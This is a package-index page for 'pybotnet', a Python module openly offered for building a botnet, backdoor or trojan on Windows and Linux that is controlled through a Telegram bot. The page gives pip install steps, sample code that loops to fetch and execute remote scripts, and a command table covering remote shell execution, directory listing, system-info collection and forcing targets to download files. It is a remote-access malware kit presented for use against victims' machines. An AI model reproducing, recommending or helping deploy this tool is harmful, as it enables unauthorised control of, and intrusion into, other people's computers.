Skip to main content

A Python module for building botnet ,backdoor or trojan with Telegram control panel

Project description

pybotnet

A Python module for building [botnet ,backdoor or trojan] for windows and linux with Telegram control panel

Features:

  • get command from telegram and execute scripts
  • get command and send message by third party proxy
  • get target info
  • sleep source by Optional message
  • get ls (dirctory list)
  • export file to targets system (target download a link :) )
  • for more see commands table end of this page

See the TODO List if you want to help me <3

Requirements:

  • Python 3.6 or higher.
  • Telegram account
  • your account number ID (get it from @userinfobot)
  • telegram api token (Get it from the telegram botfather)

Usage:

pip install pybotnet
# this is sample_code.py 

from pybotnet import pybotnet
import time


# ! rename configs.py.sample to configs.py
# ! and edit configs.py data
from configs import TELEGRAM_TOKEN, ADMIN_CHAT_ID

# * if you compile code without shell: is_sheel=False
# * show_log: just for debugging
# * send_system_data: send system short info in bot messages

bot = pybotnet.PyBotNet(TELEGRAM_TOKEN, ADMIN_CHAT_ID,
                        show_log=True, send_system_data=True, is_shell=True)

delay = 10

while True:
    print('*'*100)
    bot.get_and_execute_scripts_by_third_party_proxy()
    time.sleep(delay)

Commmands:

Send this COMMANDs to your api bot in telegram, using the admin account.

If you want the command to run only on one system, write the MAC address of that system first, like: 66619484755211 get_info

COMMAND Sample DO THIS Minimum version required tested on
get_info get_info return system info 0.06 windows, linux
do_sleep <scconds> <message (Optional)> do_sleep 99999 hi, i see you! <if message != none : print(message) > ; time.sleep(seccond) 0.08 windows, linux
cmd <system command> cmd mkdir new_folder run system command in shell or cmd (Be careful not to give endless command like ping google.com -t in windows or ping google.com in linux) TODO:add timeout 0.07 windows, linux
ls <route> ls C:\ , ls /home Returns a list of folders and files in that path 0.09 windows, linux
export_file <download_link> export_file https://github.com/onionj/pybotnet/archive/refs/heads/master.zip target donwload this file and save to script path route 0.14 windows

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pybotnet-0.15.3.tar.gz (22.0 kB view details)

Uploaded Source

Built Distribution

pybotnet-0.15.3-py3-none-any.whl (20.9 kB view details)

Uploaded Python 3

File details

Details for the file pybotnet-0.15.3.tar.gz.

File metadata

  • Download URL: pybotnet-0.15.3.tar.gz
  • Upload date:
  • Size: 22.0 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.4.1 importlib_metadata/4.6.0 pkginfo/1.7.0 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.61.1 CPython/3.8.6

File hashes

Hashes for pybotnet-0.15.3.tar.gz
Algorithm Hash digest
SHA256 8eb3b0a7c2a21e20aedcfce9137a92cafc5109e76f8b7d5214c1c94e519743bb
MD5 cb49aa14ea75a7ec33608d30bc5521b1
BLAKE2b-256 01736c7974ed220dd494a1fc1850108e4f9fd782bd2c2e3ad5491ecbe8e41762

See more details on using hashes here.

File details

Details for the file pybotnet-0.15.3-py3-none-any.whl.

File metadata

  • Download URL: pybotnet-0.15.3-py3-none-any.whl
  • Upload date:
  • Size: 20.9 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.4.1 importlib_metadata/4.6.0 pkginfo/1.7.0 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.61.1 CPython/3.8.6

File hashes

Hashes for pybotnet-0.15.3-py3-none-any.whl
Algorithm Hash digest
SHA256 da7d1a6d9132da9965ad0509f29c6deafd475d51cc1bc9c7933c122e2b3b2f46
MD5 0b519bfaa8df7a33b88e0a39de555419
BLAKE2b-256 eb746b15eceec0505be7250789ae36d1c14000ee8b8e7b254cc3781c7847f850

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page